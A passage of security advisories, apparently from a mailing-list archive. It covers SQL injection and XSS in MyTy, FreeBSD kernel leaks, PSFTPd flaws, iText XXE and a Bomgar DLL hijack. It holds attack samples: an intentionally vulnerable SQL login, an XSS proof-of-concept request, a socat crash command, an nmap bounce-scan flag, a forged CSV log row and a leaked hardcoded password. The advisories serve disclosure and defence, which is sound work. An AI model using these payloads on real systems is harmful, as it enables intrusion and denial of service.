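    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pwhash TEXT)")
    conn.execute("INSERT INTO users (email, pwhash) VALUES (?, ?)",
                 ("alice@example.invalid", "hash-of-1234"))
    conn.create_function("sleep", 1, _sleep)
    return conn


def login_vulnerable(conn: sqlite3.Connection, email: str, pwhash: str) -> Optional[Tuple]:
    """login_email concatenated into the SQL string, as the advisory describes."""
    sql = ("SELECT id FROM users WHERE email = '" + email +
           "' AND pwhash = '" + pwhash + "'")
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, email: str, pwhash: str) -> Optional[Tuple]:
    """Prepared statement: the payload is only ever data, never SQL."""
    return conn.execute("SELECT id FROM users WHERE email = ? AND pwhash = ?",
                        (email, pwhash)).fetchone()


def timed(fn, *args) -> Tuple[Optional[Tuple], float]:
    t0 = time.monotonic()
    row = fn(*args)
    return row, time.monotonic() - t0


def demo() -> dict:
    conn = make_db()
    _, slow = timed(login_vulnerable, conn, PAYLOAD, "x")   # sleep() runs: injection
    _, fast = timed(login_safe, conn, PAYLOAD, "x")         # no delay: literal compare
    ok = login_safe(conn, "alice@example.invalid", "hash-of-1234")
    return {"vulnerable_delay": slow, "safe_delay": fast, "legit_login": ok}
```

The measured delay is the whole signal in a time-based blind injection; the
parameterized query shows none because the database never parses the payload
as SQL. The "optional" character filtering in the fix section is a defence in
depth at best: the MySQL payload above uses only quotes, parentheses and a plus
sign, and a filter that strips them still leaves the concatenation in place.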


CSNC-2017-030 MyTy Reflected Cross-Site Scripting (XSS)

2017-11-21 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  MyTy
# Vendor:   Finlane GmbH
# CSNC ID:  CSNC-2017-030
# CVE ID:   -
# Subject:  Reflected Cross-Site Scripting (XSS)
# Risk: High
# Effect:   Remotely exploitable
# Author:   Nicolas Heiniger <nicolas.heini...@compass-security.com>
# Date: 21.11.2017
#
#

Introduction:
-
MyTy[1] is a software framework that includes a crowdfunding module. It can be
installed on a customer server and used to create whitelabel websites for
crowdfunding platforms.

Compass Security discovered a web application security flaw in the login page of
the administration web console that allows an unauthenticated attacker to
execute JavaScript code in the browser of a legitimate user. This allows, for
instance, to redirect the user to a phishing page and gather credentials.


Affected:
-
Vulnerable:
 * MyTy 5.1.0 to 5.1.7


Technical Description
-
In the login page of the administration console, a tyLang parameter is passed
together with the user and the password in the login request. This parameter is
then included unencoded in the HTTP response.

The login request for a proof of concept is as follows:
===
POST /tycon/index.php HTTP/1.1
Host: [CUT BY COMPASS]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: [CUT BY COMPASS]
Cookie: tyFl=de_de; XSRF-TOKEN=ZNc%2FZRg4sCgXP0g3IZZ8QxsO7caLshyKp7u75yiyW5o%3D;
 lang=de; PHPSESSID=b4pcsacfvpv716e3l825cqbuo3; tyBl=en_us; cfce=1;
 _ga=GA1.2.75537659.1504612703; cf_cookie_policy_read=1;
 _gid=GA1.2.1498092563.1504761922
CSNC-HEN: Pentest1-Blue
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

view=default==de"alert(1)
_user_id=0_user_hash==admin=123456
===

The HTTP response shows that the payload is returned unencoded in the HTML page:
===
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 07 Sep 2017 06:52:05 GMT
Content-Type: text/html; charset=utf-8

[CUT BY COMPASS]

myty-Login | myty 5.1.7/2017-09-06

var myty = {
version: '5.1.7',
revision: 5001007,
backend: {
basepath: '/tycon',
language: 'de"alert(1)',
themepath: '/tycon/themes/spring'
},
[CUT BY COMPASS]
===


Workaround / Fix:
-
Install an up to date version of the MyTy software.

As a developer:
This issue can be fixed by properly encoding dangerous characters in the output
according to the encoding rules of the respective type of context (HTML body,
HTML attribute, JS string, generated URLs). For normal HTML body content, the
following HTML entities can be used:
<  ->  &lt;
>  ->  &gt;
"  ->  &quot;
'  ->  &#x27;
&  ->  &amp;
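The encoding rules above applied to the tyLang reflection, as an added Python example (the MyTy console is PHP; this is not the vendor's code). It implements the HTML-body entity table, an encoder for the JavaScript string context the response actually places the value in, and a small template mirroring the var myty snippet (the template shape is an assumption) so the unencoded and encoded renderings can be compared.

```python
"""Context-aware output encoding for the reflected tyLang parameter.

Added example, not MyTy's code. It models the flaw described above: a request
parameter is copied verbatim into a single-quoted JavaScript string literal
inside the page's inline script, and the fix is to encode for that context.
"""
import re

# Entity table for normal HTML body content (the five characters listed above).
HTML_ENTITIES = {"<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "&": "&amp;"}


def encode_for_html_body(value: str) -> str:
    """Encode a value that lands in HTML body content (text between tags)."""
    return "".join(HTML_ENTITIES.get(ch, ch) for ch in value)


def encode_for_js_string(value: str) -> str:
    """Encode a value that lands inside a JS string literal in an inline script.

    Every character except ASCII letters and digits is emitted as a \\uXXXX
    escape, so quotes, backslashes, newlines and the '<' of a closing
    </script> tag can never terminate the literal or the script element.
    (json.dumps alone is not enough here: it leaves '<' and '>' untouched.)
    """
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
            continue
        # Escape per UTF-16 code unit so astral characters become surrogate pairs.
        units = ch.encode("utf-16-be")
        for i in range(0, len(units), 2):
            out.append("\\u%04x" % int.from_bytes(units[i:i + 2], "big"))
    return "".join(out)


# Shape of the inline script from the response above (assumed, trimmed).
SCRIPT_TEMPLATE = (
    "<script>\n"
    "var myty = {\n"
    "  backend: { basepath: '/tycon', language: '%s' }\n"
    "};\n"
    "</script>\n"
)


def render_vulnerable(ty_lang: str) -> str:
    """The reflection as shipped: the parameter is inserted unencoded."""
    return SCRIPT_TEMPLATE % ty_lang


def render_fixed(ty_lang: str) -> str:
    """The same page with the parameter encoded for the JS string context."""
    return SCRIPT_TEMPLATE % encode_for_js_string(ty_lang)


def language_literal(html: str) -> str:
    """Return the raw text between "language: '" and the next single quote.

    Shows whether the inserted value stays confined to its string literal.
    """
    m = re.search(r"language: '([^']*)'", html)
    return m.group(1) if m else ""


# Constructed hostile input: it tries to close the literal and run code.
SAMPLE_INPUT = "de'; alert(1); //"
```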


Timeline:
-
2017-11-21: Coordinated public disclosure date
2017-09-08: Release of fix in version 5.1.8
2017-09-08: Initial vendor response
2017-09-07: Initial vendor notification
2017-09-07: Discovery by Nicolas Heiniger


References:
---
[1] https://www.finlane.com/loesungen/whitelabel-pages/


FreeBSD Security Advisory FreeBSD-SA-17:10.kldstat [REVISED]

2017-11-21 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-17:10.kldstatSecurity Advisory
  The FreeBSD Project

Topic:  Information leak in kldstat(2)

Category:   core
Module: kernel
Announced:  2017-11-15
Credits:Ilja van Sprundel
TJ Corley
Affects:All supported versions of FreeBSD.
Corrected:  2017-11-15 22:34:15 UTC (stable/11, 11.1-STABLE)
2017-11-15 22:49:47 UTC (releng/11.1, 11.1-RELEASE-p4)
2017-11-15 22:50:20 UTC (releng/11.0, 11.0-RELEASE-p15)
2017-11-15 22:35:16 UTC (stable/10, 10.4-STABLE)
2017-11-15 22:50:47 UTC (releng/10.4, 10.4-RELEASE-p3)
2017-11-15 22:51:08 UTC (releng/10.3, 10.3-RELEASE-p24)
CVE Name:   CVE-2017-1088

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

0.   Revision history

v1.0   2017-11-15  Initial release.
v1.1   2017-11-20  Corrected credit. Ilja van Sprundel first reported the
   issue to the project, but wasn't cited. The FreeBSD
   Security Team apologizes to Ilja for this oversight.

I.   Background

The kldstat(2) syscall provides information about loaded kld files.  The
syscall takes a userland argument of struct kld_file_stat which is then
filled with data about the kld file requested.

II.  Problem Description

The kernel does not properly clear the memory of the kld_file_stat
structure before filling the data.  Since the structure filled by the
kernel is allocated on the kernel stack and copied to userspace, a leak
of information from the kernel stack is possible.

III. Impact

Some bytes from the kernel stack can be observed in userspace.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch
# fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch.asc
# gpg --verify kldstat.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                        r325867
releng/10.3/                                                      r325878
releng/10.4/                                                      r325877
stable/11/                                                        r325866
releng/11.0/                                                      r325876
releng/11.1/                                                      r325875
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1088>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-17:10.kldstat.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-17:10.kldstat

2017-11-16 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-17:10.kldstatSecurity Advisory
  The FreeBSD Project

Topic:  Information leak in kldstat(2)

Category:   core
Module: kernel
Announced:  2017-11-15
Credits:TJ Corley
Affects:All supported versions of FreeBSD.
Corrected:  2017-11-15 22:34:15 UTC (stable/11, 11.1-STABLE)
2017-11-15 22:49:47 UTC (releng/11.1, 11.1-RELEASE-p4)
2017-11-15 22:50:20 UTC (releng/11.0, 11.0-RELEASE-p15)
2017-11-15 22:35:16 UTC (stable/10, 10.4-STABLE)
2017-11-15 22:50:47 UTC (releng/10.4, 10.4-RELEASE-p3)
2017-11-15 22:51:08 UTC (releng/10.3, 10.3-RELEASE-p24)
CVE Name:   CVE-2017-1088

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The kldstat(2) syscall provides information about loaded kld files.  The
syscall takes a userland argument of struct kld_file_stat which is then
filled with data about the kld file requested.

II.  Problem Description

The kernel does not properly clear the memory of the kld_file_stat
structure before filling the data.  Since the structure filled by the
kernel is allocated on the kernel stack and copied to userspace, a leak
of information from the kernel stack is possible.

III. Impact

Some bytes from the kernel stack can be observed in userspace.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch
# fetch https://security.FreeBSD.org/patches/SA-17:10/kldstat.patch.asc
# gpg --verify kldstat.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                        r325867
releng/10.3/                                                      r325878
releng/10.4/                                                      r325877
stable/11/                                                        r325866
releng/11.0/                                                      r325876
releng/11.1/                                                      r325875
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1088>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-17:10.kldstat.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-17:09.shm

2017-11-16 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-17:09.shmSecurity Advisory
  The FreeBSD Project

Topic:  POSIX shm allows jails to access global namespace

Category:   core
Module: shm
Announced:  2017-11-15
Credits:Whitewinterwolf
Affects:FreeBSD 10.x
Corrected:  2017-11-13 23:21:17 UTC (stable/10, 10.4-STABLE)
2017-11-15 22:45:50 UTC (releng/10.4, 10.4-RELEASE-p3)
2017-11-15 22:45:13 UTC (releng/10.3, 10.3-RELEASE-p24)
CVE Name:   CVE-2017-1087

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

POSIX shared memory objects allow realtime inter-process communication by
sharing a memory area through the use of a named path (see shm_open(2)).

This is used by some multi-process applications to share data between running
processes, such as a common cache or to implement a producer-consumer model
where several worker processes handle requests pushed by a producer process.

II.  Problem Description

Named paths are globally scoped, meaning a process located in one jail can
read and modify the content of POSIX shared memory objects created by a
process in another jail or the host system.

III. Impact

A malicious user that has access to a jailed system is able to abuse shared
memory by injecting malicious content in the shared memory region.  This
memory region might be executed by applications trusting the shared memory,
like Squid.

This issue could lead to a Denial of Service or local privilege escalation.

IV.  Workaround

No workaround is available, but systems without jails or jails not having
local users are not vulnerable.

V.   Solution

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Reboot the system for the update to take effect.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
Reboot the system for the update to take effect.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 10.4, FreeBSD 10-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-17:09/shm-10.patch
# fetch https://security.FreeBSD.org/patches/SA-17:09/shm-10.patch.asc
# gpg --verify shm-10.patch.asc

[FreeBSD 10.3]
# fetch https://security.FreeBSD.org/patches/SA-17:09/shm-10.3.patch
# fetch https://security.FreeBSD.org/patches/SA-17:09/shm-10.3.patch.asc
# gpg --verify shm-10.3.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                        r325783
releng/10.3/                                                      r325873
releng/10.4/                                                      r325874
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1087>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-17:09.shm.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-17:08.ptrace

2017-11-16 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-17:08.ptrace Security Advisory
  The FreeBSD Project

Topic:  Kernel data leak via ptrace(PT_LWPINFO)

Category:   core
Module: ptrace
Announced:  2017-11-15
Credits:John Baldwin
Affects:All supported versions of FreeBSD.
Corrected:  2017-11-10 12:28:43 UTC (stable/11, 11.1-STABLE)
2017-11-15 22:39:41 UTC (releng/11.1, 11.1-RELEASE-p4)
2017-11-15 22:40:15 UTC (releng/11.0, 11.0-RELEASE-p15)
2017-11-10 12:31:58 UTC (stable/10, 10.4-STABLE)
2017-11-15 22:40:32 UTC (releng/10.4, 10.4-RELEASE-p3)
2017-11-15 22:40:46 UTC (releng/10.3, 10.3-RELEASE-p24)
CVE Name:   CVE-2017-1086

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The ptrace(2) syscall provides the facility for a debugger to control the
execution of the target process and to obtain necessary status information
about it.  The struct ptrace_lwpinfo structure is reported by one of the
ptrace(2) subcommands and contains a lot of the information about the stopped
thread (light-weight process or LWP, thus the name).

II.  Problem Description

Not all information in the struct ptrace_lwpinfo is relevant for the state
of any thread, and the kernel does not fill the irrelevant bytes or short
strings.  Since the structure filled by the kernel is allocated on the
kernel stack and copied to userspace, a leak of information of the kernel
stack of the thread is possible from the debugger.

III. Impact

Some bytes from the kernel stack of the thread using ptrace(PT_LWPINFO)
call can be observed in userspace.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-17:08/ptrace.patch
# fetch https://security.FreeBSD.org/patches/SA-17:08/ptrace.patch.asc
# gpg --verify ptrace.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/10/                                                        r325643
releng/10.3/                                                      r325871
releng/10.4/                                                      r325870
stable/11/                                                        r325642
releng/11.0/                                                      r325869
releng/11.1/                                                      r325868
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1086>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-17:08.ptrace.asc>
-BEGIN PGP SIGNATURE-

Advisory X41-2017-006: Multiple Vulnerabilities in PSFTPd Windows FTP Server

2017-11-13 Thread X41 D-Sec GmbH Advisories

X41 D-Sec GmbH Security Advisory: X41-2017-006

Multiple Vulnerabilities in PSFTPd Windows FTP Server
=

Overview

Confirmed Affected Versions: 10.0.4 Build 729
Confirmed Patched Versions: None
Vendor: Sergei Pleis Softwareentwicklung
Vendor URL: http://www.psftp.de/ftp-server/
Vector: Network
Credit: X41 D-Sec GmbH, Eric Sesterhenn, Markus Vervier
Status: Public
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2017-006-psftpd/


Summary and Impact
--
Several issues have been identified, which allow attackers to hide
information in log files, recover passwords and crash the whole server.

The server binary uses neither ASLR nor DEP, which would make exploitation harder.


Product Description
---
From the vendor page, roughly translated:
PSFTPd is a user-friendly, functional and robust FTP server software with
support for FTP, FTPS and SFTP.



Use after free
==
Severity Rating: High
Vector: Network
CVE: CVE-2017-15271
CWE: 416
CVSS Score: 7.5
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H


Summary and Impact
--
An invalid memory access issue could be triggered remotely in the SFTP
component of PSFTPd. This issue could be triggered prior to authentication.
The PSFTPd server did not automatically restart, which enabled attackers
to perform a very effective DoS attack against this service. By sending
the following SSH identification / version string to the server, a NULL
pointer dereference could be triggered:

$ cat tmp.14
SSH-2.0-


$ cat tmp.14 | socat - TCP:192.168.122.50:22

The issue appears to be a race condition in the window message handling,
performing the cleanup for invalid connections. Upon further
investigation X41 D-Sec GmbH could confirm that the accessed memory was
already freed.

X41 D-Sec GmbH enabled the memory debugging functionality page heap for
the psftpd_svc.exe executable using the command “gflags.exe /p /disable
psftpd_svc.exe /full”. When observing the crash in the WinDBG 19
debugging tool, it could be confirmed that access to an already freed
page was taking place.



Log Injection
=
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15270
CWE: 117
CVSS Score: 5.3
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N


Summary and Impact
--
The PSFTPd server does not properly escape data before writing it into a
Comma Separated Values (CSV) file. This can be used by attackers to hide
data in the Graphical User Interface (GUI) view and create arbitrary
entries to a certain extent.
Special characters such as '"', ',' and '\r' are not escaped and can be used
to add new entries to the log.
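How the CSV escaping the advisory calls for would look, as an added Python example that is not PSFTPd's code (the log column layout and the sample rows are constructed): a naive comma-joined writer beside one that quotes every field, with both read back to show how many rows a CSV-aware viewer would display.

```python
"""CSV log writing that survives hostile field values.

Added example, not PSFTPd's code. It contrasts a naive comma-join log writer,
which lets a field containing '"', ',' or '\\r' forge extra log rows, with a
writer that quotes every field the RFC 4180 way (embedded quotes doubled), and
reads both logs back to count the rows an operator would see.
"""
import csv
import io

FIELDS = ["time", "client_ip", "user", "event"]


def write_naive(rows):
    """How a log ends up when fields are joined with commas, unescaped."""
    buf = io.StringIO()
    for row in rows:
        buf.write(",".join(str(v) for v in row) + "\r\n")
    return buf.getvalue()


def write_quoted(rows):
    """Quote every field: commas, quotes and CR/LF inside a value stay inside it."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    writer.writerows(rows)
    return buf.getvalue()


def read_rows(text):
    """Parse the log the way a CSV-aware viewer would."""
    return list(csv.reader(io.StringIO(text)))


# Constructed rows. The second carries a client-supplied user name that tries
# to finish its own row with a fake event and start a forged "admin" row.
HOSTILE_USER = 'bob,"LOGIN OK"\r\n2017-08-31 10:00:01,10.0.0.1,admin'
SAMPLE_ROWS = [
    ["2017-08-31 10:00:00", "192.0.2.10", "alice", "LOGIN OK"],
    ["2017-08-31 10:00:02", "192.0.2.77", HOSTILE_USER, "LOGIN FAILED"],
]


def forged_row_count(text):
    """Rows beyond the two that were actually logged."""
    return len(read_rows(text)) - len(SAMPLE_ROWS)
```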


Workarounds
---
None



Passwords stored in Plain Text
==
Severity Rating: Low
Vector: Local
CVE: CVE-2017-15272
CWE: 312
CVSS Score: 3.3
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N


Summary and Impact
--
The PSFTPd server stores its configuration inside the file PSFTPd.dat. This
file is a Microsoft Access Database and can be extracted by using the
command "mdb-export PSFTPd.dat USERS" from mdbtools
(https://github.com/brianb/mdbtools). The application sets the encrypt
flag with the password "ITsILLEGAL", but this is not required to extract
the data.

The user's password is shown in clear text, since it is not stored securely.


Workarounds
---
Use the Active Directory connector for your users.



FTP Bounce Scan
===
Severity Rating: Medium
Vector: Network
CVE: CVE-2017-15269
CWE: 441
CVSS Score: 5.0
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N


Summary and Impact
--
The PSFTPd server does not prevent FTP bounce scans by default.
These can be performed using "nmap -b" and allow attackers to perform scans
via the FTP server.


Workarounds
---
It is possible to prevent FTP bounce scans by setting: Kontrollmanager >
Domain > Sicherheit > Register "FTP Bounce and FXP"




Workarounds
---
None



About X41 D-Sec GmbH

X41 D-Sec is a provider of application security services. We focus on
application code reviews, design review and security testing. X41 D-Sec
GmbH was founded in 2015 by Markus Vervier. We support customers in
various industries such as finance, software development and public
institutions.



Timeline

2017-08-31  Issues found
2017-09-18  Vendor contacted
2017-09-19  Vendor reply
2017-10-11  CVE IDs requested
2017-10-11  CVE IDs assigned
2017-11-06  Vendor informed us that apparently a fixed version was
released. We cannot confirm, since we do not have
access.
2017-11-07  Public release

-- 
X41 D-SEC GmbH, Dennewartstr. 25-27, D-52068 Aachen
T: +49 241 9809418-0, Fax: -9
Unternehmenssitz: Aachen, Amtsgericht Aachen: HRB19989
Geschäftsführer: Markus Vervier






CVE-2017-9096 iText XML External Entity Vulnerability

2017-11-06 Thread Advisories
##
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#
##
#
# Product: iText PDF Library
# Vendor: iText Group
# CVE ID: CVE-2017-9096
# CSNC ID: CSNC-2017-017
# Subject: XML External Entity Attack (XXE)
# Risk: Medium
# Effect: Remotely exploitable
# Author: Benjamin Bruppacher <benjamin.bruppac...@compass-security.com>
# Date: 2017-11-06
#
##

Introduction:
-
iText is a software developer toolkit that allows users to integrate PDF
functionalities within their applications, processes or products.

The XML parsers used inside the library are not configured to disable external
entities. This can be used for XML External Entity Attacks[1].

Affected versions:
-
Vulnerable:
* 2.0.8
* 5.5.11
* 7.0.2
Not vulnerable:
* 5.5.12
* 7.0.3

Technical Description
-
The attack can be carried out by submitting a malicious PDF to an iText
application that parses XML data.
By placing a malicious XXE payload inside the XML data that resides in the
PDF, an attacker can, for example, extract files or forge requests on the server.

Timeline:
-
2017-05-10: Discovery by Benjamin Bruppacher
2017-05-15: Initial vendor notification
2017-08-01: Vendor releases patch
2017-11-06: Disclosure of the advisory

References:
---
[1] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing


Bomgar Remote Support - Local Privilege Escalation (CVE-2017-5996)

2017-10-26 Thread VSR Advisories

   Virtual Security Research, LLC.
  https://www.vsecurity.com/
  Security Advisory


=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Advisory Name: Bomgar Remote Support - Local Privilege Escalation
 Release Date: 2017-10-26
  Application: Bomgar Remote Support
 Versions: 15.2.x before 15.2.3
   16.1.x before 16.1.5
   16.2.x before 16.2.4
 Severity: High/Medium
   Author: Robert Wessen 
   Author: Mitch Kucia 
Vendor Status: Update Released [2]
CVE Candidate: CVE-2017-5996
    Reference: https://www.vsecurity.com/download/advisories/20171026-1.txt

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Product Description
~-~
From Bomgar's website [1]: "The fastest, most secure way for experts to access
and support the systems that need them."


Vulnerability Overview
~~
In mid-January, VSR identified a privilege escalation vulnerability in the Bomgar
Remote Support application which can be used to escalate from any unprivileged
user to nt authority/system on Microsoft Windows 7 systems. The vulnerability
originates from an nt authority/system service being executed from a folder
with excessive permissions. The exploit requires a remote support agent to log
into the affected system.


Vulnerability Details
~---~
The Bomgar Remote Support agent enables remote support personnel to establish
screen sharing, access command shell, and perform system administration tasks
on machines with the agent installed. The agent, by default, creates a service
as the Windows LocalSystem account and creates a folder at
C:\ProgramData\bomgar-ssc-0x (where each h is a hex character). The
agent is also executed from this folder, so the folder is included in the
Windows dynamic library loader search path. The default permissions on the
C:\ProgramData folder allow all users, even unprivileged ones, to append and
write files. These permissions are inherited by sub-directories unless
explicitly overridden. These permissions are not changed during the
installation of the agent, so a DLL planting/hijack is possible.

A Trojan horse with the same name as one of the requested, but not present,
libraries can be placed inside the C:\ProgramData\bomgar-ssc-0x folder
since this folder is writeable by all users. When a remote support person
attempts to connect to the host, the malicious library will be loaded and code
can be executed as nt authority/system.


Versions Affected
~---~
The issue was originally discovered in version 16.1.1, although it likely
exists since at least version 14. All testing was performed exclusively on
Windows 7, however the vulnerability is suspected to be present on all
supported Windows platforms.


Vendor Response
~-~
The following timeline details Bomgar's response to the reported issue:

2017-02-05    VSR contacted Bomgar via several public email addresses to file a
  security report.

2017-02-06    Bomgar replied, VSR provided additional details on the
  vulnerability and Bomgar began internal triage.

2017-02-13    Bomgar confirmed reproduction and indicated a hotfix will be
  available to select customers on 2017-02-17. Patch for all
  customers will be available at a later date.

2017-03-28    Bomgar releases patch in Remote Support versions 15.2.3 [2],
  16.1.5 [3], and 16.2.4 [4].

2017-10-26    VSR advisory released.


Recommendation
~~
Upgrade all client installs to the latest version of Bomgar Remote Support
software as soon as possible.


Common Vulnerabilities and Exposures (CVE) Information
~~
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2017-5996 to this issue. This is a candidate for
inclusion in the CVE list (https://cve.mitre.org), which standardizes
names for security problems.


Acknowledgments
~--~
Thanks to the Bomgar development team for a prompt response, confirmation, and
patch.


